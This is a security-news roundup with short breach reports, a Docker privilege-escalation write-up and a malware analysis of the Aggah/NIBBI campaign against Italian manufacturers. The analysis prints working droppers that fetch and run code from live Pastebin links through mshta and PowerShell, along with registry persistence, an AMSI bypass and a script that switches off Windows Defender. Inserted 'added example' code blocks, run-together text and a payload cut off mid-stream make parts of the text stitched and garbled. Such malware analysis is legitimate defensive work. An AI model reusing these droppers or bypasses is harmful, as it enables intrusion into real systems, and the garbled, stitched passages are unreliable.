Elexon, a middleman in the UK power grid network hit by cyber-attack
Experts reported the hack of several supercomputers across Europe
A bug in Edison Mail iOS app impacted over 6,400 users
FBI warns US organizations of ProLock ransomware decryptor not working
Mandrake, a highly sophisticated Android spyware used in targeted attacks
Stored XSS in WP Product Review Lite plugin allows for automated takeovers
Texas Department of Transportation (TxDOT) hit by a ransomware attack
129 million records of Russian car owners available on the dark web
Australian steel producer BlueScope hit by cyberattack
Bluetooth BIAS attack threatens billions of devices
Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways
Easyjet hacked: 9 million customers data exposed along with 2,200+ credit card details
Hackers Target Oil Producers During COVID-19 Slump
Adobe fixed several memory corruption issues in some of its products
Israel is suspected to be behind the cyberattack on Iranian port
Researchers disclose five Microsoft Windows zero-days
Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials
Three flaws in Nitro Pro PDF reader expose businesses to hack
VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director
Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia
Japan suspects HGV missile data leak in Mitsubishi security breach
Meal delivery service Home Chef discloses data breach
Santander, one of the biggest European banks, was leaking sensitive data on their website
Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware
Tens of thousands Israeli websites defaced
Cyber-Criminal espionage Operation insists on Italian Manufacturing
Experts found a Privilege escalation issue in Docker Desktop for Windows
Microsoft warns of massive campaign using COVID-19 themed emails
Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry
Experts observed a spike in COVID-19 related malspam emails containing GuLoader
Silent Night Zeus botnet available for sale in underground forums
The Florida Unemployment System suffered a data breach
Voter information for 2 million Indonesians leaked online

Pierluigi Paganini

(SecurityAffairs – newsletter)


Personal details and documents for millions of Indians available in the deep web

Researchers have discovered a dump containing the personal details of 29.1M Indian jobseekers that was offered for free in the hacking underground.

Researchers discovered a dump containing the personal details of 29.1M Indian jobseekers that was offered for free in the hacking underground.

An anonymous entity told Cyble researchers that the data were stored on an unprotected Elasticsearch instance that is no longer accessible.

While Cyble was investigating the issue, a threat actor published more than 2,000 Indian identity cards (Aadhaar cards) on a hacking forum; the files appear to have originated in 2019.


Then the threat actor leaked 1.8M identity cards belonging to citizens of the Madhya Pradesh state on the same forum.

“Cyble has indexed this information on their data breach monitoring and notification platform, Amibreached.com. People who are concerned about their information leakage, can ascertain the risks by registering to the platform.” reads the post published by Cyble.

Cyble researchers also discovered that a threat actor posted a 2.3 GB (zipped) file on one of the hacking forums.

This time the leak contains the personal details of millions of Indian job seekers from different states. At the time of writing, the experts are still investigating the source of the leak.

“It appears to have originated from a resume aggregator given the sheer volume and detailed information,” the experts state.

“Cyble researchers have identified a sensitive data breach on the darkweb where an actor has leaked personal details of ~29 Million Indian Job Seekers from the various states. The original leak appears to be from a resume aggregator service collecting data from various known job portals. Cyble’s team is still investigating this further and will be updating their article as they bring more facts to the surface. This breach includes sensitive information such as email, phone, home address, qualification, work experience etc.”

Crooks could use personal information exposed in both data leaks to conduct various malicious activities, including identity thefts, scams, and corporate espionage.

Pierluigi Paganini

(SecurityAffairs – Indians data leaks, hacking)


Online education site EduCBA discloses data breach and reset customers’ pwds

The online education portal EduCBA discloses a data breach and is resetting customers’ passwords in response to the incident.

Online education website EduCBA has disclosed a data breach and has started notifying customers that, in response to the incident, it is resetting their passwords.

EduCBA is a leading global provider of skill-based education with 500,000+ members across 40+ countries. It offers 2,500+ courses prepared by top professionals from the industry to help participants achieve their goals.

The company is notifying its customers of the incident by email, confirming that their data have been accessed by an unauthorized party.

“Therefore, as a caution, we have invalidated passwords of all the users. You may retrieve your password here,” reads the data breach notification.

The data breach notification does not include technical details about the attack; it only states that email addresses, names, passwords, courses visited, etc. may have been compromised.

The online education website states that no financial information was exposed as they use third-party processors such as PayPal and 2Checkout to process payments.


As a precaution, EduCBA states that it has reset all users’ passwords.

As usual, customers that have used their EduCBA credentials at other sites have to change their passwords at these sites too.

Customers should remain vigilant against cyber attacks, as crooks may use their data to carry out spear-phishing attacks.

Pierluigi Paganini

(SecurityAffairs – EduCBA, hacking)


Voter information for 2 million Indonesians leaked online

A hacker has leaked the 2014 voter information for close to 2 million Indonesians on a well-known hacker forum and threatens to release 200 million.

A threat actor has published the 2014 voter information for close to 2 million Indonesians on a popular hacker forum and threatens to release data for a total of 200 million voters.

The dump includes voter records in individual PDF files that were allegedly stolen from the General Election Commission of Indonesia (KPU).

According to intelligence firm Under the Breach, the PDFs are organized by Indonesian city; the threat actor leaked information on 2,300,000 Indonesian citizens. Leaked details include names, addresses, ID numbers, birth dates, and more, and they appear to date back to 2013.

The KPU replied that the data was public information, it was available for anyone during the 2014 election. The KPU highlighted that its systems were not hacked.

Pierluigi Paganini

(SecurityAffairs – Indonesians, hacking)


The Florida Unemployment System suffered a data breach

Officials revealed that the Florida Unemployment System suffered a data breach that impacted some residents who have made unemployment claims.

The Florida Department of Economic Opportunity revealed that the Florida Unemployment System suffered a data breach that impacted some residents who have made unemployment claims.

It has notified 98 people who have been impacted by the incident; government representatives did not disclose when the breach took place, the total number of affected individuals, or the type of information compromised.

Agency spokeswoman Paige Landrum announced that the breach was addressed within one hour after officials became aware of it. The Florida Department of Economic Opportunity is offering the impacted citizens identity protection services for free.

Impacted users should be vigilant and report any unauthorized activity on their financial accounts.

“The DEO has received more than 2 million claims seeking unemployment benefits from Floridians since the coronavirus pandemic caused mass business closings around the state, though only 1.6 million claims have been verified.” reported the AP agency. “Just under 1 million jobless workers in Florida have been paid more than $2.6 billion in benefits.”

State Sen. Linda Stewart, D-Orlando, expressed concern about the response of the agency to the security breach and the measures it has adopted to prevent future incidents. Stewart sent a letter to Department of Management Services Secretary Jonathan Satter, whose office oversees information technology for other state agencies.

“Given the agency’s (DEO) track record with processing unemployment applications, I’m sure you will understand the great concern I have that all remedies have been quickly taken and that Floridians can be assured that their personal information is now secured and will be protected from future attacks,” Stewart wrote.

The good news is that the Florida Department of Economic Opportunity is not aware of any malicious activity abusing the exposed data.

Pierluigi Paganini

(SecurityAffairs – Florida, hacking)


Experts found a Privilege escalation issue in Docker Desktop for Windows

A severe privilege escalation vulnerability, tracked as CVE-2020-11492, has been addressed in the Windows Docker Desktop Service. 

Cybersecurity researchers from Pen Test Partners publicly disclosed a privilege escalation vulnerability in the Windows Docker Desktop Service. 

The CVE-2020-11492 issue affects the way the service uses named pipes when communicating as a client to child processes. 

“Docker Desktop for Windows suffers from a privilege escalation vulnerability to SYSTEM.  The core of the issue lies with the fact that the Docker Desktop Service, the primary Windows service for Docker, communicates as a client to child processes using named pipes.” reads the analysis published by Pen Test Partners.

“The high privilege Docker Desktop Service can be tricked into connecting to a named pipe that has been setup by a malicious lower privilege process.  Once the connection is made, the malicious process can then impersonate the Docker Desktop Service account (SYSTEM) and execute arbitrary system commands with the highest level privileges.”

Experts discovered that the Docker Desktop Service can be tricked by attackers into connecting to a named pipe that has been set up by a malicious lower privilege process. Then the process can impersonate the Docker Desktop Service account and execute arbitrary commands with the highest privileges.

Upon installing Docker Desktop for Windows, a service called Docker Desktop Service is installed and runs by default, waiting for the Docker Desktop application to start.

Once the Docker software is started it will create several child processes to manage several functions such as process monitoring and image creation. Windows OS uses pipes for inter-process communication (IPC).

Named pipes could allow the server side of the connection to impersonate the client account who is connecting.  The impersonation functionality allows the service to drop its credentials in favour of the connecting client.  Experts pointed out that when restricted operating system functionalities and files are requested, the action is performed under the impersonated account and not the service account that the process was launched under.

This specific right is dubbed “Impersonate a client after authentication,” and is assigned to specific accounts by default including admin, network service, IIS App Pool, and Microsoft SQL Server Account.

“By default, services that are started by the Service Control Manager have the built-in Service group added to their access tokens. Component Object Model (COM) servers that are started by the COM infrastructure and that are configured to run under a specific account also have the Service group added to their access tokens. As a result, these services get this user right when they are started.” continues the post.

“Anything started by the Service Control Manager will automatically get the impersonation privilege, no matter which account is used to start the service.”

Experts discovered that an attacker that is able to execute code under the context of a process with the above privileges, could set up a malicious pipe to compromise the software and elevate their privileges to system-level. 

Experts pointed out that attackers need Administrator rights to create such a service.

“Let’s say you happen to be hosting a vulnerable IIS Web Application on the same machine as Docker for Windows,” continues the analysis. “This could be one example of a successful attack vector. The initial attack vector could utilize a vulnerability in the web application to perform code execution under the limited IIS App Pool account.”

The researchers sent the details to the Docker security team on March 25; Docker initially replied that impersonation is a Windows feature and reported the issue to Microsoft.

Experts provided a Proof-of-Concept (PoC) to Docker that finally acknowledged it on April 1. 

On May 11, Docker released version 2.3.0.2 that addresses the vulnerability.

“After a few emails back and forth, then finally submitting a working PoC, Docker did agree that it was a security vulnerability and as such have now issued a fix.  When the Docker service process connects to the named pipes of spawned child processes it now uses the SecurityIdentification impersonation level.  This will allow the server end of the pipe to get the identity and privileges of the client but not allow impersonation.” Pen Test Partners concludes.
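To make the mechanism concrete, here is an added example (not Docker’s or Pen Test Partners’ code) that runs a named-pipe server and client in one PowerShell session on Windows: the client connects either at the default Impersonation level or at the Identification level the fix adopts, and the server reports which token level it obtains through ImpersonateNamedPipeClient. The pipe name is constructed for this demo and PowerShell 5.1 or later is assumed.

```powershell
# Added example: shows why the SecurityIdentification level matters for a
# named-pipe client. Nothing here is Docker's own code or pipe name.

Add-Type -AssemblyName System.Core   # System.IO.Pipes on Windows PowerShell 5.1

$PipeName = 'demo-impersonation-level'   # constructed name, not Docker's pipe

function Start-PipeServer {
    # Creates the server end and begins waiting for one client asynchronously.
    param([string]$Name = $PipeName)
    $server = New-Object System.IO.Pipes.NamedPipeServerStream(
        $Name, [System.IO.Pipes.PipeDirection]::InOut, 1,
        [System.IO.Pipes.PipeTransmissionMode]::Byte,
        [System.IO.Pipes.PipeOptions]::Asynchronous)
    return [pscustomobject]@{ Stream = $server; Pending = $server.WaitForConnectionAsync() }
}

function Connect-PipeClient {
    # The client side decides how much of its token the server may use.
    # -Hardened asks for Identification: the server learns who connected but
    # cannot run code as that account, which is the post-fix behaviour the
    # analysis describes. Without it the default Impersonation level applies.
    param([string]$Name = $PipeName, [switch]$Hardened)
    $level = if ($Hardened) {
        [System.Security.Principal.TokenImpersonationLevel]::Identification
    } else {
        [System.Security.Principal.TokenImpersonationLevel]::Impersonation
    }
    $client = New-Object System.IO.Pipes.NamedPipeClientStream(
        '.', $Name, [System.IO.Pipes.PipeDirection]::InOut,
        [System.IO.Pipes.PipeOptions]::None, $level)
    $client.Connect(5000)
    return $client
}

function Get-ImpersonatedTokenLevel {
    # Server side: once the client is connected, impersonate it (RunAsClient
    # wraps ImpersonateNamedPipeClient) and record the level of the token the
    # thread now holds. This is the step a low-privilege pipe server abused in
    # the Docker case; here the level is only read and the token reverted.
    param($Server)
    $Server.Pending.Wait()
    $script:SeenLevel = $null
    try {
        $Server.Stream.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
            $script:SeenLevel = [System.Security.Principal.WindowsIdentity]::GetCurrent().ImpersonationLevel
        })
    } catch {
        # An Anonymous-level client lands here: there is nothing to impersonate
        $script:SeenLevel = "refused ($($_.Exception.GetType().Name))"
    } finally {
        $Server.Stream.Dispose()
    }
    return $script:SeenLevel
}

foreach ($hardened in @($false, $true)) {
    $srv = Start-PipeServer
    $cli = Connect-PipeClient -Hardened:$hardened
    $level = Get-ImpersonatedTokenLevel -Server $srv
    $cli.Dispose()
    $requested = if ($hardened) { 'Identification' } else { 'Impersonation' }
    "client requested $requested -> server thread token level: $level"
}
```

An Identification-level token lets the server read the client’s name and group SIDs but fails when used to open secured objects, which is the property the patched service relies on.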

Pierluigi Paganini

(SecurityAffairs – Windows, hacking)


Cyber-Criminal espionage Operation insists on Italian Manufacturing

ZLab researchers spotted a new malicious espionage activity targeting Italian companies operating worldwide in the manufacturing sector.

Introduction

During our Cyber Threat Intelligence monitoring we spotted new malicious activities targeting some Italian companies operating worldwide in the manufacturing sector, some of them also part of the automotive production chain.

The group behind this activity is the same one we identified in past malicious operations described in Roma225 (12/2018), Hagga (08/2019), Mana (09/2019) and YAKKA (01/2020). This actor was first spotted by Palo Alto’s UNIT42 in 2018 during wide-scale operations against technology, retail, manufacturing, and local government industries in the US, Europe and Asia. UNIT42 also stated the hypothesis of possible overlaps with the Gorgon APT group, but no clear evidence confirmed that.

To keep track of all of our reports, we have summarized all the monitored campaigns with their TTPs and final payloads:

Table 1: Synthetic table of the campaigns

As we can see from the table, the Aggah campaigns varied over time but maintained some common points. All campaigns used as the initial stage an Office document (PowerPoint or Excel) armed with a macro, and some of them used injection methods.

All attack operations used a “Signed Binary Proxy Execution” technique abusing Mshta, a legitimate Microsoft tool, and used at least one executable file for the infection. In addition, the use of a PowerShell stage or the abuse of legitimate web services has been reported in some campaigns.

Furthermore, the CMSTP bypass is a new feature present only in the 2020 campaigns: the first malware samples identified using this technique all date back to mid/late 2019, which suggests that the threat actor likes to test the latest disclosed techniques in order to keep its campaigns at the forefront. Regarding persistence mechanisms, we note that scheduled tasks were used initially, while the latest infections use registry Run keys. All threats use at least one obfuscation method to make the analysis harder.

Looking at the evolution of the final payloads, we can say that this evolution is certainly due to a chronological factor, since Revenge RAT had become obsolete, but also to a technological factor and the capabilities involved: Revenge RAT has the classic functionality of spyware, while AZORult is considered an info stealer. The last payload used, Agent Tesla, combines the functionality of the previous payloads, as it is considered both an info stealer and spyware.

Technical Analysis

The infection chain starts with a malicious Microsoft PowerPoint document weaponized with a malicious macro.

Hash: 7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3
Threat: Malicious macro
Brief Description: Malicious ppt dropper with macro.
Ssdeep: 192:EFm9QiR1zQRZ0DfZGJjBVySCGVBdJWUpFVzsn6xVNdwWFj/WOvYoZLlmYvJuec9r:i8R1ERZ0DMJjU+bRuxURKMxpcksPY

Table 2. Sample information

The content of the macro is short and quite easy to read:

Figure 1: Content of the malicious macro

The VBA macro is responsible for downloading and executing malicious code retrieved from Pastebin. j[.]mp is a URL shortening service; the following request redirects to and downloads a Pastebin content:

Figure 2: Shortener resolution

The MSHTA Drop Chain

Like the previous campaigns, this threat actor uses a Signed Binary Proxy Execution (ID: T1218) technique abusing “mshta.exe” (T1170), a signed and legitimate Microsoft tool. Adversaries can use mshta.exe to proxy the execution of malicious .hta files, JavaScript or VBScript.

Figure 3: Piece of code of the Bnv7ruYp paste

As shown in the above figure, the code is only lightly encoded: each character of certain strings is replaced by an escape sequence representing its UTF-8 code (the script language attribute, for example, is written as &#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;, which decodes to “VBScript”).

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
'id1
CreateObject("WScript.Shell").Run """mshta""""http:\\pastebin.com\raw\5CzmZ5NS"""
CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Pornhubs"" /tr ""\""mshta\""http:\\pastebin.com\raw\5CzmZ5NS"" /F ",0
'id2
CreateObject("WScript.Shell").RegWrite StrReverse("TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\sJEBiiMw""", "REG_SZ"
'id3
CreateObject("WScript.Shell").RegWrite StrReverse("\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\YL0je2fU""", "REG_SZ"

'defid
CreateObject("WScript.Shell").Run """mshta""""http:\\pastebin.com\raw\UyFaSxgj"""
CreateObject("WScript.Shell").RegWrite StrReverse("FED\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\UyFaSxgj""", "REG_SZ"

self.close
</script>

Code Snippet 1

This stage acts as a dropper: it downloads and executes several Pastebin contents through mshta.exe.

Figure 4: Evidence of the NIBBI author

This latest campaign has been named after the Pastebin user spreading the malicious pastes. This time the name is “NIBBI”. The first component is 5CzmZ5NS:

Figure 5: Piece of the code of 5CzmZ5NS paste

The second one is sJEBiiMw:

Figure 6: Piece of the code of the sJEBiiMw paste

The third one, YL0je2fU:

Figure 7: Piece of the code of the YL0je2fU paste

and the fourth component, UyFaSxgj:

Figure 8: Piece of the code of the UyFaSxgj paste

This obfuscation technique is typical of this particular actor, who has largely leveraged it in many malicious operations. Moreover, the usage of a legitimate website such as Pastebin (T1102) gives a significant amount of cover, with the advantage of being very often whitelisted. Using such a service reduces the C2 exposure. In the past, other groups such as APT41, FIN6 or FIN7 also used similar techniques to decouple attack infrastructure information from their implant configuration.

Once the first component (5CzmZ5NS) is decoded, it unveils some logic, as shown in Code Snippet 2. First of all, the script sets a registry key as a Windows persistence mechanism (T1060), in which it places the execution of the following command: “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bin", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:\Software).iamresearcher)|IEX"""", 0 : window.close"")", "REG_SZ"
CreateObject("Wscript.Shell").regwrite "HKCU\Software\iamresearcher", "$fucksecurityresearchers='contactmeEX'.replace('contactme','I');sal M $fucksecurityresearchers;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$iwannaleftsellingtools.open('GET','https://pastebin.com/raw/rnS6CUzX',$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split '-' |ForEach-Object {[char][byte]""0x$_""};$asciiString= $asciiChars -join ''|M;[Byte[]]$Cli2= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''https://pastebin.com/raw/Rk4engdU'').replace(''#'',''!#!@#'').replace(''!#!@#'',''0x'')')) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS('InstallUtil.exe',$Cli2)" , "REG_SZ"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell ((gp HKCU:\Software).iamresearcher)|IEX", null, objConfig, intProcessID)
'i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way
'i am not a coder 😉 i watch you on twitter every day thanks 🙂 i love my code reports!
'i am not a coder! bang 😉
self.close
</script>

Code Snippet 2

The code contains some “funny” comments addressed to the Twitter community of security researchers who constantly monitor the actor’s operations. The final payload is retrieved from the Rk4engdU paste.
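The string tricks seen so far (the numeric character references in the script tag, the StrReverse() literals of Code Snippet 1, and the dash-separated hex stream that Code Snippet 2 turns back into characters) are easy to undo mechanically. The following analyst helper is an added example, not part of ZLab’s report: it decodes constructed sample lines shaped like the published snippets, with the Pastebin links replaced by the placeholder <paste-url>, so that the persistence artifacts can be read and hunted for.

```powershell
# Added example (not ZLab's code): undo the three string tricks used by the
# NIBBI mshta chain so the registry keys and command lines become readable.

function ConvertFrom-NumericCharRefs {
    # "&#86;&#66;..." -> "VB...": every &#NN; becomes the character with that code
    param([string]$Text)
    return [regex]::Replace($Text, '&#(\d+);',
        [System.Text.RegularExpressions.MatchEvaluator]{ param($m) [char][int]$m.Groups[1].Value })
}

function ConvertTo-ReversedString {
    # Equivalent of VBScript's StrReverse()
    param([string]$Text)
    $chars = $Text.ToCharArray()
    [array]::Reverse($chars)
    return -join $chars
}

function Expand-StrReverseLiterals {
    # Replaces each StrReverse("...") call with the literal it evaluates to,
    # so registry paths and command lines read left to right again.
    param([string]$Line)
    return [regex]::Replace($Line, 'StrReverse\("([^"]*)"\)',
        [System.Text.RegularExpressions.MatchEvaluator]{
            param($m) '"' + (ConvertTo-ReversedString $m.Groups[1].Value) + '"' })
}

function ConvertFrom-DashHex {
    # Undoes the  -split '-' | ForEach-Object {[char][byte]"0x$_"}  stage of
    # Code Snippet 2 without executing anything.
    param([string]$Hex)
    $chars = $Hex -split '-' | ForEach-Object { [char][Convert]::ToByte($_, 16) }
    return -join $chars
}

function Get-DecodedStage {
    # Runs the decoders over VBScript lines and returns their readable form.
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        Expand-StrReverseLiterals (ConvertFrom-NumericCharRefs $line)
    }
}

# Constructed sample: the shape of Code Snippet 1 with the live paste links removed
$SampleVbs = @(
    '<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">',
    'CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Pornhubs"" /tr ""mshta <paste-url>"" /F ",0',
    'CreateObject("WScript.Shell").RegWrite StrReverse("TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), "mshta <paste-url>", "REG_SZ"',
    'CreateObject("WScript.Shell").RegWrite StrReverse("\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), "mshta <paste-url>", "REG_SZ"'
)

# Constructed sample for the hex stage: the opening bytes of Code Snippet 3 ($t0='DEX')
$SampleHex = '24-74-30-3d-27-44-45-58-27'

Get-DecodedStage -Lines $SampleVbs
ConvertFrom-DashHex -Hex $SampleHex
```

The decoded output names the scheduled task, the Run key values and the HKCU\Software value the chain writes, which are the host artifacts a detection rule or a triage script should look for.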

Figure 9: Piece of the rnS6CUzX paste

Decoding this hex stream we get the following PowerShell code:

function UNpaC0k3333300001147555 {
    [CmdletBinding()]
    Param ([byte[]] $byteArray)
    Process {
        Write-Verbose "Get-DecompressedByteArray"
        $input = New-Object System.IO.MemoryStream( , $byteArray )
        $output = New-Object System.IO.MemoryStream
        $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
        $puffpass = New-Object byte[](1024)
        while($true){
            $read = $01774000.Read($puffpass, 0, 1024)
            if ($read -le 0){break}
            $output.Write($puffpass, 0, $read)
        }
        [byte[]] $bout333 = $output.ToArray()
        Write-Output $bout333
    }
}
$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('OBFUSCATED PAYLOAD ONE'.replace('@!','0x'))| g;
[Byte[]]$blindB=('OBFUSCATED PAYLOAD TWO'.replace('@!','0x'))| g
[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
$blind=[System.Reflection.Assembly]::Load($deblindB)
[Amsi]::Bypass()
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

Code Snippet 3 

The PowerShell Loader

Code Snippet 3 is a PowerShell script that declares the function “UNpaC0k3333300001147555”, whose purpose is to gunzip-decompress the two embedded payloads. Both of them are .NET binaries. The de-obfuscated code is stored in the deblindB variable and then executed.

As the name deblindB suggests, this assembly is loaded and the static method “Bypass” of its “Amsi” class is invoked.

Figure 10: Amsi Bypass exploit evidence

The payload embedded in the variable $MNB, instead, is another injection tool, but this one is not executed by the script, probably because both binaries perform the same action and only one is sufficient.

At this point, we dig into the “sJEBiiMw” component, obtaining:

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/ygwLUS9C'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)", null, objConfig, intProcessID)
self.close
</script>

Code Snippet 4

This script downloads and executes another payload from Pastebin, ygwLUS9C: a Base64-encoded binary with some basic string replacement applied (the “.” characters are swapped back to “0” and the string is reversed before decoding). We also noticed that this executable uses the CMSTP bypass technique (T1191), already seen in our previous report.

Figure 11: CMSTP Bypass evidence

However, in this case there is a new element compared to the previous version: through the CMSTP bypass, a VBS script is written to the “\%TEMP%\” folder and executes many disruptive commands:

Figure 12: Evidence of the VBS script loaded and executed

The VBS script, as its first-line comment also states, aims to reduce the security level of the infected machine to zero. The script is the following:

'this script will put system on 0 security
If Not WScript.Arguments.Named.Exists("elevate") Then
  CreateObject("Shell.Application").ShellExecute WScript.FullName _
    , """" & WScript.ScriptFullName & """ /elevate", "", "runas", 1
  WScript.Quit
End If
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware","0","REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring","0","REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection","0","REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable","0","REG_DWORD"
WScript.Sleep 100
outputMessage("Set-MpPreference -DisableRealtimeMonitoring $true")
outputMessage("Set-MpPreference -DisableBehaviorMonitoring $true")
outputMessage("Set-MpPreference -DisableBlockAtFirstSeen $true")
outputMessage("Set-MpPreference -DisableIOAVProtection $true")
outputMessage("Set-MpPreference -DisableScriptScanning $true")
outputMessage("Set-MpPreference -SubmitSamplesConsent 2")
outputMessage("Set-MpPreference -MAPSReporting 0")
outputMessage("Set-MpPreference -HighThreatDefaultAction 6 -Force")
outputMessage("Set-MpPreference -ModerateThreatDefaultAction 6")
outputMessage("Set-MpPreference -LowThreatDefaultAction 6")
outputMessage("Set-MpPreference -SevereThreatDefaultAction 6")

Sub outputMessage(byval args)
On Error Resume Next
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell " + args, null, objConfig, intProcessID)
End SubOn Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell $cici=@(36,117,115,101,114,80,97,116,104,32,61,32,36,101,110,118,58,85,83,69,82,80,82,79,70,73,76,69,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,58,92,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,77,115,98,117,105,108,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,97,108,99,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,112,111,119,101,114,115,104,101,108,108,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,119,115,99,114,105,112,116,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,109,115,104,116,97,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,99,109,10
